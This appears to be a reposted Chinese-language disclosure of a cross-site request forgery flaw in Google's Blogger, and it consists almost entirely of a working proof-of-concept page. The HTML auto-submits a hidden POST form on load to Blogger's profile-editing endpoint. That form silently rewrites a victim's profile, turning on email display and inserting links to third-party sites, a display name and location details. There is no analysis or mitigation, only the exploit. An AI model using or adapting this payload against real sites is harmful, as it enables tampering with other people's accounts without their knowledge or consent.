[谷歌旗下Blogger CSRF漏洞 全文]

[#] [ CSRF Change Profile Information ]

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://www.blogger.com/edit-profile.do">
<input type="hidden" name="enable" value="true"/>
<input type="hidden" name="showEmail" value="true">
<input type="hidden" name="showFollowed" value="true">
<input type="hidden" name="email" value="[email protected]">
<input type="hidden" name="widget.displayname" value="test">
<input type="hidden" name="photourl" value="">
<input type="hidden" name="photowidth" value="">
<input type="hidden" name="photoheight" value="">
<input type="hidden" name="audioclipurl" value="http://www.sitedirsec.com"/>
<input type="hidden" name="gender" value="MALE"/>
<input type="hidden" name="url" value="http://www.51doseo.com"/>
<input type="hidden" name="wishlisturl" value="http://www.51doseo.com">
<input type="hidden" name="imusername" value="DaOne">
<input type="hidden" name="imnetwork" value="_nil_">
<input type="hidden" name="widget.city" value="Libya">
<input type="hidden" name="widget.state" value="Tripoli">
<input type="hidden" name="widget.country" value="LY">
<input type="hidden" name="ind" value="_nil_">
<input type="hidden" name="occupation" value="">
<input type="hidden" name="interests" value="Info">
<input type="hidden" name="widget.aboutme" value="Info">
<input type="hidden" name="movies" value="Movies">
<input type="hidden" name="music" value="Music">
<input type="hidden" name="books" value="Books">
</form>
</body>
</html>

你可能感兴趣的:(html,Enable,action,谷歌,hidden,csrf漏洞)